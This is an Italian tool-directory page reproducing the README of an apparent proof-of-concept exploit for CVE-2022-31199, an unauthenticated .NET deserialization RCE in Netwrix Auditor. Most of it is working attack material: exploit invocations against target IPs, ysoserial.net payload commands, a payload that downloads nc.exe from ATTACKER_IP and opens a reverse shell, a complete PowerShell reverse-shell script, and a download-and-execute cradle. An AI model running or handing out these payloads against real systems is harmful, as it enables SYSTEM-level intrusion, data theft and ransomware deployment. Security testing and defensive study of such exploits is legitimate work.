Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-31199 — Exploit proof-of-concept per CVE-2022-31199, una critica RCE di deserializzazione .NET in Netwrix Auditor. Include script Python e PowerShell, generazione di payload con ysoserial.net e firme di rilevamento per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/developerfred/cve-2022-31199
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlApprendimento e FormazioneRed TeamingSviluppo PayloadLab e Pratica
GitHub
developerfred/cve-2022-31199

CVE-2022-31199

Exploit proof-of-concept per CVE-2022-31199, una critica RCE di deserializzazione .NET in Netwrix Auditor. Include script Python e PowerShell, generazione di payload con ysoserial.net e firme di rilevamento per test di sicurezza autorizzati.

Vedi Repository
1310 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-31199 - PoC degli Exploit RCE di Netwrix Auditor

🔍 Panoramica della vulnerabilità

CVE-2022-31199 è una vulnerabilità critica di deserializzazione non sicura di oggetti presente nelle versioni di Netwrix Auditor precedenti alla 10.5. La vulnerabilità è presente in un servizio .NET Remoting non protetto in ascolto sulla porta TCP 9004, che consente ad attaccanti remoti non autenticati di eseguire codice arbitrario con privilegi NT AUTHORITY\SYSTEM.

Dettagli della vulnerabilità

  • CVE ID: CVE-2022-31199
  • Punteggio CVSS: 9.8 (Critico)
  • CWE: CWE-502 (Deserializzazione di dati non attendibili)
  • Versioni interessate: Netwrix Auditor < 10.5
  • Vettore di attacco: Rete (Non autenticato)
  • Privilegi richiesti: Nessuno
  • Impatto: Compromissione completa del sistema con privilegi SYSTEM
  • CISA KEV: Inclusa nel catalogo Known Exploited Vulnerabilities

Impatto nel mondo reale

Questa vulnerabilità è stata attivamente sfruttata in ambienti reali da:

  • Campagna del malware Truebot (operatori ransomware CL0P/TA505 legati alla Russia)
  • Gruppo cybercriminale Silence
  • Attori delle minacce FIN11

Uno sfruttamento riuscito porta tipicamente a:

  • Compromissione completa del dominio Active Directory
  • Movimento laterale attraverso i sistemi monitorati
  • Esfiltrazione dei dati
  • Distribuzione di ransomware

📦 Contenuto del repository

Questo repository contiene exploit Proof of Concept (PoC) completi per CVE-2022-31199:

File

  1. exploit.py - Framework di sfruttamento basato su Python
  2. exploit.ps1 - Script di sfruttamento PowerShell
  3. README.md - Questa documentazione
  4. manual-exploitation.md - Guida passo-passo allo sfruttamento manuale

🛠️ Requisiti

Strumenti richiesti

Sfruttamento basato su Windows (consigliato)

  • ysoserial.net - Generatore di payload di deserializzazione .NET

    • Download: https://github.com/pwntester/ysoserial.net
    • Release: https://github.com/pwntester/ysoserial.net/releases
  • ExploitRemotingService - Strumento di sfruttamento .NET Remoting

    • Download: https://github.com/tyranid/ExploitRemotingService
    • Alternativa (migliorata): https://github.com/codewhitesec/ExploitRemotingService

Requisiti dello script Python

  • Python 3.6 o superiore
  • Solo libreria standard (nessuna dipendenza esterna per i controlli di base)
  • Accesso agli eseguibili di ysoserial.net ed ExploitRemotingService

Requisiti dello script PowerShell

  • PowerShell 5.1 o superiore
  • Sistema operativo Windows
  • ysoserial.exe ed ExploitRemotingService.exe nella directory dello script

🚀 Avvio rapido

1. Verificare se il target è vulnerabile

Usando Python:

python3 exploit.py --target 192.168.1.100 --check

Usando PowerShell:

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

2. Generare il payload

# Using ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"

3. Eseguire l'exploit

Python (con payload pre-generato):

python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]

PowerShell (automatico):

.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

📖 Utilizzo dettagliato

Exploit Python (exploit.py)

Controllo base della vulnerabilità

python3 exploit.py --target 10.10.10.100 --check

Sfruttamento completo con payload personalizzato

# Step 1: Generate payload
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"

# Step 2: Execute exploit
python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]

Opzioni avanzate

# Custom port
python3 exploit.py --target 10.10.10.100 --port 9004 --check

# Custom endpoint
python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check

Argomenti della riga di comando

--target    : Target IP address or hostname (required)
--port      : Target port (default: 9004)
--endpoint  : .NET Remoting endpoint name (default: UAVRServer)
--check     : Only check vulnerability, don't exploit
--payload   : Base64 encoded payload from ysoserial.net

Exploit PowerShell (exploit.ps1)

Solo controllo della vulnerabilità

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

Eseguire un comando

# Simple command execution
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

# Write output to file
.\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"

# Custom port
.\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"

Parametri

-Target     : Target IP address or hostname (required)
-Port       : Target port (default: 9004)
-Command    : Command to execute on target (default: "whoami")
-CheckOnly  : Only check vulnerability, don't exploit

🎯 Esempi di sfruttamento

Esempio 1: Raccolta di informazioni

# Check system information
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"

Esempio 2: Reverse Shell

Configurare il listener:

nc -lvnp 4444

Generare il payload:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"

Esempio 3: Reverse Shell PowerShell

Creare lo script di reverse shell (rev.ps1):

$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Ospitare lo script:

python3 -m http.server 8000

Generare il payload:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"

Esempio 4: Utilizzare ExploitRemotingService direttamente

# Test connectivity
ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver

# Execute with lease mode (bypasses some protections)
ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\

# Execute with object reference
ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"

🔬 Dettagli tecnici

Causa principale della vulnerabilità

La vulnerabilità deriva da:

  1. Endpoint .NET Remoting non protetto sulla porta TCP 9004
  2. Deserializzazione BinaryFormatter senza un adeguato filtraggio dei tipi
  3. Servizio UAVRServer che accetta oggetti serializzati arbitrari
  4. Servizio eseguito con privilegi SYSTEM nelle distribuzioni tipiche

Processo di sfruttamento

1. Attacker connects to TCP port 9004
2. Identifies .NET Remoting service (UAVRServer endpoint)
3. Generates malicious serialized payload using ysoserial.net
4. Sends payload via .NET Remoting protocol
5. Target deserializes object using BinaryFormatter
6. Gadget chain executes arbitrary code
7. Code runs with NT AUTHORITY\SYSTEM privileges

Catene gadget supportate

I seguenti gadget ysoserial.net funzionano contro questa vulnerabilità:

  • TypeConfuseDelegate (consigliato)
  • ObjectDataProvider
  • PSObject
  • WindowsIdentity
  • TextFormattingRunProperties

Protocollo di rete

Scarica lo strumento